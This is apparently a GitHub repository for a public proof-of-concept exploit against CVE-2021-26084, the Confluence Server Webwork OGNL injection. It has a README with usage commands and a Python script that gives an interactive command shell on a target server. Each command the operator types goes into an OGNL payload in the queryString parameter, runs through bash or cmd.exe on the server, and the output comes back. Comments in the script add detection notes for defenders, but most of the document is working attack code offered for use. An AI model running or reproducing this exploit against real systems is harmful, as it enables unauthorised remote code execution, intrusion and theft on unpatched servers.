├── README.md
└── Confluence_OGNLInjection.py
/README.md:
--------------------------------------------------------------------------------
# CVE-2021-26084 - Confluence Server Webwork OGNL injection

- An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.


### IMPORTANT
This exploit is only intended to facilitate demonstrations of the vulnerability by researchers. I disapprove of illegal actions and take no responsibility for any malicious use of this script. The proof of concept demonstrated in this repository does not expose any hosts and was performed with permission.


#### • `queryString` parameter request
![BurpRequest](https://user-images.githubusercontent.com/6265911/131630570-857df5dd-525d-43ec-9466-5c92ac9c1322.png)


### Exploit Usage

#### Commands:
`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com`

#### or
`$ python3 Confluence_OGNLInjection.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x`



#### • Exploitation with Confluence_OGNLInjection.py
![Exploit](https://user-images.githubusercontent.com/6265911/131630805-147628fc-7772-47be-943e-12d24b052adb.png)



- References:

https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

https://www.exploit-db.com/exploits/50243
--------------------------------------------------------------------------------
/Confluence_OGNLInjection.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3

# Exploit Title: Confluence Server Webwork OGNL injection (PreAuth-RCE)
# Google Dork: N/A
# Date: 09/01/2021
# Exploit
# Exploit Author: h3v0x
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: All < 7.12.x versions before 7.12.5
# Tested on: Linux Distros
# CVE : CVE-2021-26084

# References:
# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

# Script layout: option parsing and HTTP session setup at module level, then an
# interactive loop (cmdExec) that POSTs one OGNL expression per prompt to the
# Confluence "createpage-entervariables" Webwork action and prints whatever the
# server reflects back in the hidden `queryString` form field.
#
# Defender notes (everything stated here is visible in this file):
#   - The request is a POST to /pages/createpage-entervariables.action carrying
#     a `queryString` form parameter whose value contains \u0027-style escaped
#     quotes, `Class.forName`, `javax.script.ScriptEngineManager` and
#     `java.lang.ProcessBuilder`. Those tokens in a request body are the natural
#     things to match in access logs, WAF rules or IDS signatures for this CVE.
#     Note that `eval` is spelled with a \u0065 escape in the payload, so a
#     signature keyed on a literal `eval` token would miss this request.
#   - The User-Agent header is a fixed string (Chrome/44.0.2403.155), so traffic
#     from this PoC is trivially fingerprintable server-side.
#   - The header above gives the affected range as 7.12.x versions before
#     7.12.5; the linked Atlassian advisory is the authoritative source for the
#     full list of fixed releases.

import requests
import optparse
from bs4 import BeautifulSoup
import optparse  # duplicate of the import above; redundant but harmless
from requests.packages import urllib3
# Suppresses the InsecureRequestWarning that `verify=False` (in cmdExec) would
# otherwise emit on every request; TLS certificate validation is off for this
# script, so a MITM of the session would go unnoticed.
urllib3.disable_warnings()

# -u has no default and is checked below; -p defaults to the Webwork action
# shown in the README.
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://confluencexxx.com")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x", default="/pages/createpage-entervariables.action?SpaceKey=x")

options, args = parser.parse_args()  # `args` (positional leftovers) is never used
# One Session reused for every prompt in cmdExec.
session = requests.Session()

# Module-level globals read by cmdExec(); assigned before the -u check below,
# so `url_vuln` is None when no URL was given (the check then exits).
url_vuln = options.url
endpoint = options.path


if not options.url:

    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')
    print('[+] Example help usage: exploit.py -h')
    exit()  # site-module `exit`, not sys.exit; fine for a script, not for a library


def banner() -> None:
    """Print a fixed identification banner for the script."""

    print('---------------------------------------------------------------')
    print('[-] Confluence Server Webwork OGNL injection')
    print('[-] CVE-2021-26084')
    print('[-] https://github.com/h3v0x')
    print('--------------------------------------------------------------- \n')


def cmdExec() -> None:
    """Read commands from stdin in a loop and send each one inside the OGNL payload.

    Uses the module globals `url_vuln`, `endpoint` and `session`. The loop has
    no break: it ends only when input() raises EOFError (end of stdin), on
    KeyboardInterrupt, or when the response parsing below raises.
    """

    while True:

        cmd = input('> ')

        # Plain concatenation, no slash normalisation: a trailing '/' on -u
        # together with the leading '/' in -p yields a double slash.
        xpl_url = url_vuln + endpoint
        # Static headers; the User-Agent is a constant, so these requests share
        # one fingerprint in server logs.
        xpl_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36",
                       "Connection": "close",
                       "Content-Type": "application/x-www-form-urlencoded",
                       "Accept-Encoding": "gzip, deflate"}
        # The OGNL expression is sent as the `queryString` form field. The
        # `\\u00xx` sequences are sent literally (Python writes a backslash and
        # four hex digits); presumably the server decodes them into quote
        # characters — see the httpvoid write-up linked in the header. The user
        # supplied `cmd` is spliced verbatim into the JavaScript source that the
        # expression hands to the script engine; nothing is escaped.
        xpl_data = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022"+cmd+"\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
        # verify=False: no TLS certificate validation (warnings silenced above).
        rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data, verify=False)

        # The action re-renders the form and echoes the evaluated `queryString`
        # back as a hidden input; that reflected value is what gets printed.
        # If the response has no such input (e.g. a server that does not
        # evaluate the expression, or a non-Confluence page), find() returns
        # None and the ['value'] subscript raises TypeError, ending the loop.
        soup = BeautifulSoup(rawHTML.text, 'html.parser')
        queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']
        print(queryStringValue)


banner()
cmdExec()